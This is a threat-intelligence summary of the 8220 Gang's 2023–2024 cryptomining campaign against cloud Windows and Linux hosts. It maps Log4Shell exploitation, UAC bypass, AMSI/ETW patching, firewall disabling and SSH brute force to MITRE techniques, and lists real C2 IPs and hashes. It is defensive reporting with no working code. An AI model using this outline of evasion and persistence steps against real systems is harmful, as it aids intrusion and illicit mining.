The 8220 Gang, a Chinese-based threat actor, targeted cloud-based infrastructure across Windows and Linux in a May 2023–February 2024 campaign, exploiting known vulnerabilities CVE-2021-44228 and CVE-2022-26134. They employed multi-stage cryptomining operations with robust defense evasion techniques, including PowerShell filelessExecution on Windows, DLL sideloading, UAC bypass, AMSI/ETW patching, and Linux shell-script persistence.
Keypoints
- The 8220 Gang is a Chinese-based threat group intensifying its focus on cloud infrastructure, affecting both Linux and Windows environments.
- Initial access leveraged known vulnerabilities CVE-2021-44228 (Log4Shell) and CVE-2022-26134 to compromise targets.
- Windows activity features PowerShell-based fileless execution, DLL sideloading, UAC bypass, and AMSI/ETW evasion to deploy cryptomining.
- Linux activity relies on a shell-script downloader with defense evasion (SELinux disabled, firewall disabled, IPTABLES relaxed) and reconnaissance via masscan/spirit.
- Cryptomining operations involve multiple stages, startup persistence, and process injection (AddInProcess.exe) to run miners.
- Discovery and lateral movement combine masscan/spirit for network reach, SSH brute force, and automated SSH climbing using multiple keys and histories.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Exploitation of CVE-2021-44228 and CVE-2022-26134 to gain initial access. “exploiting well-known vulnerabilities…”
- [T1595] Active Scanning – Internet scans identify vulnerable applications as entry points. “By leveraging internet scans for vulnerable applications…”
- [T1059.001] PowerShell – Windows Stage 1 uses PowerShell for fileless execution. “The utilization of Windows PowerShell for fileless execution…”
- [T1574.002] DLL Side Loading – Stage 1/3 use DLL sideloading (propsys.dll) to bypass defenses. “DLL sideloading…”
- [T1548.002] Bypass User Account Control – UAC bypass used during Windows Stage 3/4 workflow. “UAC bypass mechanism…”
- [T1562.001] Disable or Modify Tools – Patch AMSI/ETW to evade detection. “patching EtwEventWrite and AmsiScanBuffer…”
- [T1055] Process Injection – Stage 4 loads a payload into AddInProcess.exe for mining. “Process injection in AddInProcess.exe…”
- [T1543.003] Create or Modify System Process: Windows Service – Persistence via new service. “Persistence: The script creates service to maintain persistence.”
- [T1053.005] Cron – Linux persistence via cron jobs. “Deployed multiple cron jobs…”
- [T1021.004] SSH – Lateral movement via SSH and automated connections using keys. “Automates SSH connections to various hosts…”
- [T1110] Brute Force – Lateral movement uses brute force attempts against susceptible hosts. “brute force attacks (uses p.lst md5: 3cd84…)”
- [T1105] Ingress Tool Transfer – The downloader uses multiple methods to download payloads (wget, curl, lwp-download, Python urllib). “The payload is downloaded from two sets of C2…”
- [T1027] Obfuscated/Compressed Files and Information – Batch scripts are obfuscated and payloads are decrypted/decompressed. “Highly Obfuscated script” and “AES decrypted and GZIP decompression.”
- [T1562.004] Impair Defenses: Modify Firewall – Linux defense evasion includes disabling UFW/iptables protections. “Disables firewall via UFW disable.”
Indicators of Compromise
- [IP Address] – Entry/C2: 51.255.171.23, 217.182.205.238, 89.185.85.102, 178.62.234.229, 159.223.201.180
- [MD5 Hash] – Known miners and loaders: 29263792b788ecfa9f4e29699ed8ab61, 63a86932a5bad5da32ebd1689aa814b3, 915aec68a5b53aa7681a461a122594d9
- [File Name] – Network99717Man.cmd, YCWNEP, propsys.dll, ComputerDefaults.exe, AddInProcess.exe
- [Process] – AddInProcess.exe, powershell.exe, deliver.cmd
- [Port] – Crypto mining-related ports: 3333, 4444, 5555, 7777, 9000
Read more: https://www.uptycs.com/blog/8220-gang-cryptomining-cloud-based-infrastructure-cyber-threat